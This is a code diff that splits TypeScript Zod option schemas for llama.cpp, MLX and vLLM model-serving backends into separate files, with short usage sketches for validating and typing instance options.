ignore_eos: z.boolean().optional(),
temp: z.number().optional(),
top_k: z.number().optional(),
top_p: z.number().optional(),
min_p: z.number().optional(),
xtc_probability: z.number().optional(),
xtc_threshold: z.number().optional(),
typical: z.number().optional(),
repeat_last_n: z.number().optional(),
repeat_penalty: z.number().optional(),
presence_penalty: z.number().optional(),
frequency_penalty: z.number().optional(),
dry_multiplier: z.number().optional(),
dry_base: z.number().optional(),
dry_allowed_length: z.number().optional(),
dry_penalty_last_n: z.number().optional(),
dry_sequence_breaker: z.array(z.string()).optional(),
dynatemp_range: z.number().optional(),
dynatemp_exp: z.number().optional(),
mirostat: z.number().optional(),
mirostat_lr: z.number().optional(),
mirostat_ent: z.number().optional(),
logit_bias: z.array(z.string()).optional(),
grammar: z.string().optional(),
grammar_file: z.string().optional(),
json_schema: z.string().optional(),
json_schema_file: z.string().optional(),
// Example-specific params
no_context_shift: z.boolean().optional(),
special: z.boolean().optional(),
no_warmup: z.boolean().optional(),
spm_infill: z.boolean().optional(),
pooling: z.string().optional(),
cont_batching: z.boolean().optional(),
no_cont_batching: z.boolean().optional(),
mmproj: z.string().optional(),
mmproj_url: z.string().optional(),
no_mmproj: z.boolean().optional(),
no_mmproj_offload: z.boolean().optional(),
alias: z.string().optional(),
host: z.string().optional(),
port: z.number().optional(),
path: z.string().optional(),
no_webui: z.boolean().optional(),
embedding: z.boolean().optional(),
reranking: z.boolean().optional(),
api_key: z.string().optional(),
api_key_file: z.string().optional(),
ssl_key_file: z.string().optional(),
ssl_cert_file: z.string().optional(),
chat_template_kwargs: z.string().optional(),
timeout: z.number().optional(),
threads_http: z.number().optional(),
cache_reuse: z.number().optional(),
metrics: z.boolean().optional(),
slots: z.boolean().optional(),
props: z.boolean().optional(),
no_slots: z.boolean().optional(),
slot_save_path: z.string().optional(),
jinja: z.boolean().optional(),
reasoning_format: z.string().optional(),
reasoning_budget: z.number().optional(),
chat_template: z.string().optional(),
chat_template_file: z.string().optional(),
no_prefill_assistant: z.boolean().optional(),
slot_prompt_similarity: z.number().optional(),
lora_init_without_apply: z.boolean().optional(),
draft_max: z.number().optional(),
draft_min: z.number().optional(),
draft_p_min: z.number().optional(),
ctx_size_draft: z.number().optional(),
device_draft: z.string().optional(),
gpu_layers_draft: z.number().optional(),
model_draft: z.string().optional(),
cache_type_k_draft: z.string().optional(),
cache_type_v_draft: z.string().optional(),
// Audio/TTS params
model_vocoder: z.string().optional(),
tts_use_guide_tokens: z.boolean().optional(),
// Default model params
embd_bge_small_en_default: z.boolean().optional(),
embd_e5_small_en_default: z.boolean().optional(),
embd_gte_small_default: z.boolean().optional(),
fim_qwen_1_5b_default: z.boolean().optional(),
fim_qwen_3b_default: z.boolean().optional(),
fim_qwen_7b_default: z.boolean().optional(),
fim_qwen_7b_spec: z.boolean().optional(),
fim_qwen_14b_spec: z.boolean().optional(),
})
// Infer the TypeScript type from the schema
export type LlamaCppBackendOptions = z.infer<typeof LlamaCppBackendOptionsSchema>
// Helper to get all LlamaCpp backend option field keys
export function getAllLlamaCppFieldKeys(): (keyof LlamaCppBackendOptions)[] {
return Object.keys(LlamaCppBackendOptionsSchema.shape) as (keyof LlamaCppBackendOptions)[]
}
// Get field type for LlamaCpp backend options
export function getLlamaCppFieldType(key: keyof LlamaCppBackendOptions): 'text' | 'number' | 'boolean' | 'array' {
const fieldSchema = LlamaCppBackendOptionsSchema.shape[key]
if (!fieldSchema) return 'text'
// Handle ZodOptional wrapper
const innerSchema = fieldSchema instanceof z.ZodOptional ? fieldSchema.unwrap() : fieldSchema
if (innerSchema instanceof z.ZodBoolean) return 'boolean'
if (innerSchema instanceof z.ZodNumber) return 'number'
if (innerSchema instanceof z.ZodArray) return 'array'
return 'text' // ZodString and others default to text
}
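
A minimal validation sketch using the schema above; the import path and option values are placeholders, not taken from the diff.

import { LlamaCppBackendOptionsSchema } from '@/schemas/backends' // path assumed

const result = LlamaCppBackendOptionsSchema.safeParse({
  model: '/models/example-model.Q4_K_M.gguf', // placeholder path
  gpu_layers: 99,
  ctx_size: 8192,
})

if (result.success) {
  console.log('valid llama.cpp options', result.data) // typed as LlamaCppBackendOptions
} else {
  console.error(result.error.issues) // e.g. a string passed where a number is expected
}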


@@ -0,0 +1,51 @@
import { z } from 'zod'
// Define the MLX backend options schema
export const MlxBackendOptionsSchema = z.object({
// Basic connection options
model: z.string().optional(),
host: z.string().optional(),
port: z.number().optional(),
// Model and adapter options
adapter_path: z.string().optional(),
draft_model: z.string().optional(),
num_draft_tokens: z.number().optional(),
trust_remote_code: z.boolean().optional(),
// Logging and templates
log_level: z.enum(['DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL']).optional(),
chat_template: z.string().optional(),
use_default_chat_template: z.boolean().optional(),
chat_template_args: z.string().optional(), // JSON string
// Sampling defaults
temp: z.number().optional(), // Note: MLX uses "temp" not "temperature"
top_p: z.number().optional(),
top_k: z.number().optional(),
min_p: z.number().optional(),
max_tokens: z.number().optional(),
})
// Infer the TypeScript type from the schema
export type MlxBackendOptions = z.infer<typeof MlxBackendOptionsSchema>
// Helper to get all MLX backend option field keys
export function getAllMlxFieldKeys(): (keyof MlxBackendOptions)[] {
return Object.keys(MlxBackendOptionsSchema.shape) as (keyof MlxBackendOptions)[]
}
// Get field type for MLX backend options
export function getMlxFieldType(key: keyof MlxBackendOptions): 'text' | 'number' | 'boolean' | 'array' {
const fieldSchema = MlxBackendOptionsSchema.shape[key]
if (!fieldSchema) return 'text'
// Handle ZodOptional wrapper
const innerSchema = fieldSchema instanceof z.ZodOptional ? fieldSchema.unwrap() : fieldSchema
if (innerSchema instanceof z.ZodBoolean) return 'boolean'
if (innerSchema instanceof z.ZodNumber) return 'number'
if (innerSchema instanceof z.ZodArray) return 'array'
if (innerSchema instanceof z.ZodEnum) return 'text' // Enum treated as text/select
return 'text' // ZodString and others default to text
}
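
A sketch of driving input-widget selection from the schema helpers above, assuming the barrel import path; the widget names are hypothetical.

import { getAllMlxFieldKeys, getMlxFieldType } from '@/schemas/backends' // path assumed

// Map each MLX option to a rough widget kind; 'array' fields would need a multi-value input.
const mlxWidgets = getAllMlxFieldKeys().map((key) => {
  const type = getMlxFieldType(key)
  const widget = type === 'boolean' ? 'checkbox' : type === 'number' ? 'number-input' : 'text-input'
  return { key, widget }
})
// e.g. trust_remote_code -> checkbox, top_k -> number-input, chat_template -> text-input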


@@ -0,0 +1,150 @@
import { z } from 'zod'
// Define the vLLM backend options schema
export const VllmBackendOptionsSchema = z.object({
// Basic connection options (auto-assigned by llamactl)
host: z.string().optional(),
port: z.number().optional(),
// Model and engine configuration
model: z.string().optional(),
tokenizer: z.string().optional(),
skip_tokenizer_init: z.boolean().optional(),
revision: z.string().optional(),
code_revision: z.string().optional(),
tokenizer_revision: z.string().optional(),
tokenizer_mode: z.string().optional(),
trust_remote_code: z.boolean().optional(),
download_dir: z.string().optional(),
load_format: z.string().optional(),
config_format: z.string().optional(),
dtype: z.string().optional(),
kv_cache_dtype: z.string().optional(),
quantization_param_path: z.string().optional(),
seed: z.number().optional(),
max_model_len: z.number().optional(),
guided_decoding_backend: z.string().optional(),
distributed_executor_backend: z.string().optional(),
worker_use_ray: z.boolean().optional(),
ray_workers_use_nsight: z.boolean().optional(),
// Performance and serving configuration
block_size: z.number().optional(),
enable_prefix_caching: z.boolean().optional(),
disable_sliding_window: z.boolean().optional(),
use_v2_block_manager: z.boolean().optional(),
num_lookahead_slots: z.number().optional(),
swap_space: z.number().optional(),
cpu_offload_gb: z.number().optional(),
gpu_memory_utilization: z.number().optional(),
num_gpu_blocks_override: z.number().optional(),
max_num_batched_tokens: z.number().optional(),
max_num_seqs: z.number().optional(),
max_logprobs: z.number().optional(),
disable_log_stats: z.boolean().optional(),
quantization: z.string().optional(),
rope_scaling: z.string().optional(),
rope_theta: z.number().optional(),
enforce_eager: z.boolean().optional(),
max_context_len_to_capture: z.number().optional(),
max_seq_len_to_capture: z.number().optional(),
disable_custom_all_reduce: z.boolean().optional(),
tokenizer_pool_size: z.number().optional(),
tokenizer_pool_type: z.string().optional(),
tokenizer_pool_extra_config: z.string().optional(),
enable_lora_bias: z.boolean().optional(),
lora_extra_vocab_size: z.number().optional(),
lora_rank: z.number().optional(),
prompt_lookback_distance: z.number().optional(),
preemption_mode: z.string().optional(),
// Distributed and parallel processing
tensor_parallel_size: z.number().optional(),
pipeline_parallel_size: z.number().optional(),
max_parallel_loading_workers: z.number().optional(),
disable_async_output_proc: z.boolean().optional(),
worker_class: z.string().optional(),
enabled_lora_modules: z.string().optional(),
max_lora_rank: z.number().optional(),
fully_sharded_loras: z.boolean().optional(),
lora_modules: z.string().optional(),
prompt_adapters: z.string().optional(),
max_prompt_adapter_token: z.number().optional(),
device: z.string().optional(),
scheduler_delay: z.number().optional(),
enable_chunked_prefill: z.boolean().optional(),
speculative_model: z.string().optional(),
speculative_model_quantization: z.string().optional(),
speculative_revision: z.string().optional(),
speculative_max_model_len: z.number().optional(),
speculative_disable_by_batch_size: z.number().optional(),
ngpt_speculative_length: z.number().optional(),
speculative_disable_mqa: z.boolean().optional(),
model_loader_extra_config: z.string().optional(),
ignore_patterns: z.string().optional(),
preloaded_lora_modules: z.string().optional(),
// OpenAI server specific options
uds: z.string().optional(),
uvicorn_log_level: z.string().optional(),
response_role: z.string().optional(),
ssl_keyfile: z.string().optional(),
ssl_certfile: z.string().optional(),
ssl_ca_certs: z.string().optional(),
ssl_cert_reqs: z.number().optional(),
root_path: z.string().optional(),
middleware: z.array(z.string()).optional(),
return_tokens_as_token_ids: z.boolean().optional(),
disable_frontend_multiprocessing: z.boolean().optional(),
enable_auto_tool_choice: z.boolean().optional(),
tool_call_parser: z.string().optional(),
tool_server: z.string().optional(),
chat_template: z.string().optional(),
chat_template_content_format: z.string().optional(),
allow_credentials: z.boolean().optional(),
allowed_origins: z.array(z.string()).optional(),
allowed_methods: z.array(z.string()).optional(),
allowed_headers: z.array(z.string()).optional(),
api_key: z.array(z.string()).optional(),
enable_log_outputs: z.boolean().optional(),
enable_token_usage: z.boolean().optional(),
enable_async_engine_debug: z.boolean().optional(),
engine_use_ray: z.boolean().optional(),
disable_log_requests: z.boolean().optional(),
max_log_len: z.number().optional(),
// Additional engine configuration
task: z.string().optional(),
multi_modal_config: z.string().optional(),
limit_mm_per_prompt: z.string().optional(),
enable_sleep_mode: z.boolean().optional(),
enable_chunking_request: z.boolean().optional(),
compilation_config: z.string().optional(),
disable_sliding_window_mask: z.boolean().optional(),
enable_trtllm_engine_latency: z.boolean().optional(),
override_pooling_config: z.string().optional(),
override_neuron_config: z.string().optional(),
override_kv_cache_align_size: z.number().optional(),
})
// Infer the TypeScript type from the schema
export type VllmBackendOptions = z.infer<typeof VllmBackendOptionsSchema>
// Helper to get all vLLM backend option field keys
export function getAllVllmFieldKeys(): (keyof VllmBackendOptions)[] {
return Object.keys(VllmBackendOptionsSchema.shape) as (keyof VllmBackendOptions)[]
}
// Get field type for vLLM backend options
export function getVllmFieldType(key: keyof VllmBackendOptions): 'text' | 'number' | 'boolean' | 'array' {
const fieldSchema = VllmBackendOptionsSchema.shape[key]
if (!fieldSchema) return 'text'
// Handle ZodOptional wrapper
const innerSchema = fieldSchema instanceof z.ZodOptional ? fieldSchema.unwrap() : fieldSchema
if (innerSchema instanceof z.ZodBoolean) return 'boolean'
if (innerSchema instanceof z.ZodNumber) return 'number'
if (innerSchema instanceof z.ZodArray) return 'array'
return 'text' // ZodString and others default to text
}
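
A sketch of assembling typed vLLM options from the inferred type above; the model id and values are placeholders, not taken from the diff.

import type { VllmBackendOptions } from '@/schemas/backends' // path assumed

const vllmOptions: VllmBackendOptions = {
  model: 'Qwen/Qwen2.5-7B-Instruct', // placeholder model id
  tensor_parallel_size: 2,
  gpu_memory_utilization: 0.9,
  enable_prefix_caching: true,
}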


@@ -1,6 +1,30 @@
import { BackendType } from '@/types/instance'
import { z } from 'zod'
// Define the Zod schema
// Import backend schemas from separate files
import {
LlamaCppBackendOptionsSchema,
type LlamaCppBackendOptions,
getAllLlamaCppFieldKeys,
getLlamaCppFieldType,
MlxBackendOptionsSchema,
type MlxBackendOptions,
getAllMlxFieldKeys,
getMlxFieldType,
VllmBackendOptionsSchema,
type VllmBackendOptions,
getAllVllmFieldKeys,
getVllmFieldType
} from './backends'
// Backend options union
export const BackendOptionsSchema = z.union([
LlamaCppBackendOptionsSchema,
MlxBackendOptionsSchema,
VllmBackendOptionsSchema,
])
// Define the main create instance options schema
export const CreateInstanceOptionsSchema = z.object({
// Restart options
auto_restart: z.boolean().optional(),
@@ -9,191 +33,51 @@ export const CreateInstanceOptionsSchema = z.object({
idle_timeout: z.number().optional(),
on_demand_start: z.boolean().optional(),
// Common params
verbose_prompt: z.boolean().optional(),
threads: z.number().optional(),
threads_batch: z.number().optional(),
cpu_mask: z.string().optional(),
cpu_range: z.string().optional(),
cpu_strict: z.number().optional(),
prio: z.number().optional(),
poll: z.number().optional(),
cpu_mask_batch: z.string().optional(),
cpu_range_batch: z.string().optional(),
cpu_strict_batch: z.number().optional(),
prio_batch: z.number().optional(),
poll_batch: z.number().optional(),
ctx_size: z.number().optional(),
predict: z.number().optional(),
batch_size: z.number().optional(),
ubatch_size: z.number().optional(),
keep: z.number().optional(),
flash_attn: z.boolean().optional(),
no_perf: z.boolean().optional(),
escape: z.boolean().optional(),
no_escape: z.boolean().optional(),
rope_scaling: z.string().optional(),
rope_scale: z.number().optional(),
rope_freq_base: z.number().optional(),
rope_freq_scale: z.number().optional(),
yarn_orig_ctx: z.number().optional(),
yarn_ext_factor: z.number().optional(),
yarn_attn_factor: z.number().optional(),
yarn_beta_slow: z.number().optional(),
yarn_beta_fast: z.number().optional(),
dump_kv_cache: z.boolean().optional(),
no_kv_offload: z.boolean().optional(),
cache_type_k: z.string().optional(),
cache_type_v: z.string().optional(),
defrag_thold: z.number().optional(),
parallel: z.number().optional(),
mlock: z.boolean().optional(),
no_mmap: z.boolean().optional(),
numa: z.string().optional(),
device: z.string().optional(),
override_tensor: z.array(z.string()).optional(),
gpu_layers: z.number().optional(),
split_mode: z.string().optional(),
tensor_split: z.string().optional(),
main_gpu: z.number().optional(),
check_tensors: z.boolean().optional(),
override_kv: z.array(z.string()).optional(),
lora: z.array(z.string()).optional(),
lora_scaled: z.array(z.string()).optional(),
control_vector: z.array(z.string()).optional(),
control_vector_scaled: z.array(z.string()).optional(),
control_vector_layer_range: z.string().optional(),
model: z.string().optional(),
model_url: z.string().optional(),
hf_repo: z.string().optional(),
hf_repo_draft: z.string().optional(),
hf_file: z.string().optional(),
hf_repo_v: z.string().optional(),
hf_file_v: z.string().optional(),
hf_token: z.string().optional(),
log_disable: z.boolean().optional(),
log_file: z.string().optional(),
log_colors: z.boolean().optional(),
verbose: z.boolean().optional(),
verbosity: z.number().optional(),
log_prefix: z.boolean().optional(),
log_timestamps: z.boolean().optional(),
// Environment variables
environment: z.record(z.string(), z.string()).optional(),
// Sampling params
samplers: z.string().optional(),
seed: z.number().optional(),
sampling_seq: z.string().optional(),
ignore_eos: z.boolean().optional(),
temp: z.number().optional(),
top_k: z.number().optional(),
top_p: z.number().optional(),
min_p: z.number().optional(),
xtc_probability: z.number().optional(),
xtc_threshold: z.number().optional(),
typical: z.number().optional(),
repeat_last_n: z.number().optional(),
repeat_penalty: z.number().optional(),
presence_penalty: z.number().optional(),
frequency_penalty: z.number().optional(),
dry_multiplier: z.number().optional(),
dry_base: z.number().optional(),
dry_allowed_length: z.number().optional(),
dry_penalty_last_n: z.number().optional(),
dry_sequence_breaker: z.array(z.string()).optional(),
dynatemp_range: z.number().optional(),
dynatemp_exp: z.number().optional(),
mirostat: z.number().optional(),
mirostat_lr: z.number().optional(),
mirostat_ent: z.number().optional(),
logit_bias: z.array(z.string()).optional(),
grammar: z.string().optional(),
grammar_file: z.string().optional(),
json_schema: z.string().optional(),
json_schema_file: z.string().optional(),
// Example-specific params
no_context_shift: z.boolean().optional(),
special: z.boolean().optional(),
no_warmup: z.boolean().optional(),
spm_infill: z.boolean().optional(),
pooling: z.string().optional(),
cont_batching: z.boolean().optional(),
no_cont_batching: z.boolean().optional(),
mmproj: z.string().optional(),
mmproj_url: z.string().optional(),
no_mmproj: z.boolean().optional(),
no_mmproj_offload: z.boolean().optional(),
alias: z.string().optional(),
host: z.string().optional(),
port: z.number().optional(),
path: z.string().optional(),
no_webui: z.boolean().optional(),
embedding: z.boolean().optional(),
reranking: z.boolean().optional(),
api_key: z.string().optional(),
api_key_file: z.string().optional(),
ssl_key_file: z.string().optional(),
ssl_cert_file: z.string().optional(),
chat_template_kwargs: z.string().optional(),
timeout: z.number().optional(),
threads_http: z.number().optional(),
cache_reuse: z.number().optional(),
metrics: z.boolean().optional(),
slots: z.boolean().optional(),
props: z.boolean().optional(),
no_slots: z.boolean().optional(),
slot_save_path: z.string().optional(),
jinja: z.boolean().optional(),
reasoning_format: z.string().optional(),
reasoning_budget: z.number().optional(),
chat_template: z.string().optional(),
chat_template_file: z.string().optional(),
no_prefill_assistant: z.boolean().optional(),
slot_prompt_similarity: z.number().optional(),
lora_init_without_apply: z.boolean().optional(),
draft_max: z.number().optional(),
draft_min: z.number().optional(),
draft_p_min: z.number().optional(),
ctx_size_draft: z.number().optional(),
device_draft: z.string().optional(),
gpu_layers_draft: z.number().optional(),
model_draft: z.string().optional(),
cache_type_k_draft: z.string().optional(),
cache_type_v_draft: z.string().optional(),
// Audio/TTS params
model_vocoder: z.string().optional(),
tts_use_guide_tokens: z.boolean().optional(),
// Default model params
embd_bge_small_en_default: z.boolean().optional(),
embd_e5_small_en_default: z.boolean().optional(),
embd_gte_small_default: z.boolean().optional(),
fim_qwen_1_5b_default: z.boolean().optional(),
fim_qwen_3b_default: z.boolean().optional(),
fim_qwen_7b_default: z.boolean().optional(),
fim_qwen_7b_spec: z.boolean().optional(),
fim_qwen_14b_spec: z.boolean().optional(),
// Backend configuration
backend_type: z.enum([BackendType.LLAMA_CPP, BackendType.MLX_LM, BackendType.VLLM]).optional(),
backend_options: BackendOptionsSchema.optional(),
})
// Infer the TypeScript type from the schema
// Re-export types and schemas from backend files
export {
LlamaCppBackendOptionsSchema,
MlxBackendOptionsSchema,
VllmBackendOptionsSchema,
type LlamaCppBackendOptions,
type MlxBackendOptions,
type VllmBackendOptions,
getAllLlamaCppFieldKeys,
getAllMlxFieldKeys,
getAllVllmFieldKeys,
getLlamaCppFieldType,
getMlxFieldType,
getVllmFieldType
}
// Infer the TypeScript types from the schemas
export type BackendOptions = z.infer<typeof BackendOptionsSchema>
export type CreateInstanceOptions = z.infer<typeof CreateInstanceOptionsSchema>
// Helper to get all field keys
// Helper to get all field keys for CreateInstanceOptions
export function getAllFieldKeys(): (keyof CreateInstanceOptions)[] {
return Object.keys(CreateInstanceOptionsSchema.shape) as (keyof CreateInstanceOptions)[]
}
// Get field type from Zod schema
export function getFieldType(key: keyof CreateInstanceOptions): 'text' | 'number' | 'boolean' | 'array' {
export function getFieldType(key: keyof CreateInstanceOptions): 'text' | 'number' | 'boolean' | 'array' | 'object' {
const fieldSchema = CreateInstanceOptionsSchema.shape[key]
if (!fieldSchema) return 'text'
// Handle ZodOptional wrapper
const innerSchema = fieldSchema instanceof z.ZodOptional ? fieldSchema.unwrap() : fieldSchema
if (innerSchema instanceof z.ZodBoolean) return 'boolean'
if (innerSchema instanceof z.ZodNumber) return 'number'
if (innerSchema instanceof z.ZodArray) return 'array'
if (innerSchema instanceof z.ZodObject) return 'object'
if (innerSchema instanceof z.ZodRecord) return 'object' // Handle ZodRecord as object
return 'text' // ZodString and others default to text
}
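
A sketch of a full create-instance payload combining the instance-level options with backend-specific options, using only fields visible in the schema above; the values are placeholders.

import { CreateInstanceOptionsSchema, type CreateInstanceOptions } from '@/schemas/instanceOptions'
import { BackendType } from '@/types/instance'

const payload: CreateInstanceOptions = {
  auto_restart: true,
  on_demand_start: true,
  backend_type: BackendType.LLAMA_CPP,
  backend_options: { model: '/models/example.gguf', gpu_layers: 99 },
}

CreateInstanceOptionsSchema.parse(payload) // throws if any field has the wrong type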


@@ -2,14 +2,26 @@ import type { CreateInstanceOptions } from '@/schemas/instanceOptions'
export { type CreateInstanceOptions } from '@/schemas/instanceOptions'
export const BackendType = {
LLAMA_CPP: 'llama_cpp',
MLX_LM: 'mlx_lm',
VLLM: 'vllm',
// MLX_VLM: 'mlx_vlm', // Future expansion
} as const
export type BackendTypeValue = typeof BackendType[keyof typeof BackendType]
export type InstanceStatus = 'running' | 'stopped' | 'failed'
export interface HealthStatus {
status: 'ok' | 'loading' | 'error' | 'unknown'
status: 'ok' | 'loading' | 'error' | 'unknown' | 'failed'
message?: string
lastChecked: Date
}
export interface Instance {
name: string;
running: boolean;
status: InstanceStatus;
options?: CreateInstanceOptions;
docker_enabled?: boolean; // indicates backend is running via Docker
}
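
A sketch of consuming the updated types, e.g. deriving a display badge; the function and badge labels are hypothetical, the types and status values come from the file above.

import type { Instance, HealthStatus } from '@/types/instance' // path assumed

function statusBadge(instance: Instance, health?: HealthStatus): string {
  if (instance.status === 'failed' || health?.status === 'failed') return 'Failed'
  if (instance.status === 'stopped') return 'Stopped'
  return health?.status === 'ok' ? 'Running' : 'Starting'
}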